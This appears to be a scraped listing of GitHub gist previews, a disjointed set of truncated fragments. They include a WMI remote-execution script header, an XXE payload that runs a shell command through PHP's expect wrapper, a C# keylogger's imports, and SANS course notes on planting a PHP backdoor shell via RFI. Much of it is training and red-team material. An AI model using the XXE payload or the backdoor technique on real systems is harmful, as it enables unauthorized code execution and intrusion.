- no upfront installation/agents on remote/slave machines - ssh should be enough
- application components should use third-party software, e.g. HDFS, Spark's cluster, deployed separately
- configuration templating
- environment requires/asserts, i.e. we need a JVM in a given version before doing deployment
- deployment process run from Jenkins
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# A similar approach to smbexec but executing commands through WMI. | |
# Main advantage here is it runs under the user (has to be Admin) | |
# account, not SYSTEM, plus, it doesn't generate noisy messages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE. | |
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 | |
``` | |
<?xml version="1.0"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]> | |
<entry> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.NET and COM: The Complete Interoperability Guide | |
@War: The Rise of the Military-Internet Complex | |
21st Century C: C Tips from the New School | |
3D Math Primer for Graphics and Game Development (Wordware Game Math Library) | |
A Guide to Claims-Based Identity and Access Control (Microsoft patterns & practices) | |
A Guide to Kernel Exploitation: Attacking the Core | |
A More Beautiful Question: The Power of Inquiry to Spark Breakthrough Ideas | |
A Primer of Analytic Number Theory: From Pythagoras to Riemann | |
Absolute FreeBSD, 2nd Edition: The Complete Guide to FreeBSD | |
Advanced C and C++ Compiling |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
debug = 0 | |
def KSA(key): | |
keylength = len(key) | |
if debug == 1: | |
print("Current Keylength is " + str(keylength)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include <iostream> | |
#include <string> | |
#include <vector> | |
#include "pe_sieve_api.h" | |
#pragma comment(lib, "pe-sieve.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Windows.Forms; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
//KeyStroke Mouse Clicks Code | |
/* | |
* https://code.google.com/p/klog-sharp/ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'. | |
Write to a webhost: | |
nano /var/www/html/id.txt | |
Inside of id.txt we have some helper functions to debug: | |
<?php | |
echo "<pre>"; | |
echo "This is the symbol table:"; |